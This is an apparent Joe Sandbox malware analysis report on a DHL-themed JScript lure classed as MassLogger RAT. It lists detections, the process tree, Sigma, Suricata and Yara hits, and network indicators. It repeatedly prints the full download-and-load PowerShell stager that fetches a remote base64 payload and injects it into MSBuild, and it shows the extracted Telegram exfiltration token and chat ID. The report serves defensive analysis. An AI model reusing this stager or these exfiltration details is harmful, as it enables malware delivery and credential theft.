Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHl-Global-Documents.js

Overview

General Information

Sample name:DHl-Global-Documents.js
Analysis ID:1618872
MD5:b1d0c2969f79c438b3a2e6c4466850d5
SHA1:e0ed1d9756450b4e46a33f332a38a2d65a989d90
SHA256:06579997178921c0ae2f9702de7abf0987111277b4caa4bf1cc903d9279c9f6d
Tags:jsuser-TeamDreier
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected Powershell download and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7950334281:AAHp9dAAfHNwUHbGM-dLD_Mx8gH7uJ3FUPE", "Telegram Chatid": "7273417767"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.2951462853.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xefdf:$a1: get_encryptedPassword
        • 0xf307:$a2: get_encryptedUsername
        • 0xed7a:$a3: get_timePasswordChanged
        • 0xee9b:$a4: get_passwordField
        • 0xeff5:$a5: set_encryptedPassword
        • 0x10951:$a7: get_logins
        • 0x10602:$a8: GetOutlookPasswords
        • 0x103f4:$a9: StartKeylogger
        • 0x108a1:$a10: KeyLoggerEventArgs
        • 0x10451:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.2955066393.0000000002B98000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.MSBuild.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            3.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              3.2.MSBuild.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                3.2.MSBuild.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xf1df:$a1: get_encryptedPassword
                • 0xf507:$a2: get_encryptedUsername
                • 0xef7a:$a3: get_timePasswordChanged
                • 0xf09b:$a4: get_passwordField
                • 0xf1f5:$a5: set_encryptedPassword
                • 0x10b51:$a7: get_logins
                • 0x10802:$a8: GetOutlookPasswords
                • 0x105f4:$a9: StartKeylogger
                • 0x10aa1:$a10: KeyLoggerEventArgs
                • 0x10651:$a11: KeyLoggerEventArgsEventHandler
                3.2.MSBuild.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x13997:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1478f:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 14 entries

                Other

                SourceRuleDescriptionAuthorStrings
                amsi64_7528.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7416, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5Kcp
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7416, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5Kcp
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7752, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", ProcessId: 7416, ProcessName: wscript.exe
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7416, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5Kcp
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", ProcessId: 7416, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7416, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5Kcp

                  Data Obfuscation

                  barindex
                  Sigma detected: Powershell download and load assembly
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHl-Global-Documents.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7416, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5Kcp

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T09:12:10.988275+010020576351A Network Trojan was detected159.253.39.62443192.168.2.449732TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T09:12:08.910625+010020490381A Network Trojan was detected193.30.119.105443192.168.2.449731TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T09:12:15.028982+010028032742Potentially Bad Traffic192.168.2.449733158.101.44.24280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-19T09:12:10.988275+010028582951A Network Trojan was detected159.253.39.62443192.168.2.449732TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7950334281:AAHp9dAAfHNwUHbGM-dLD_Mx8gH7uJ3FUPE", "Telegram Chatid": "7273417767"}
                  Multi AV Scanner detection for submitted file
                  Source: DHl-Global-Documents.jsVirustotal: Detection: 13%Perma Link

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 193.30.119.105:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 159.253.39.62:443 -> 192.168.2.4:49732 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000001.00000002.1874305719.00007FFD99680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1874305719.00007FFD99680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
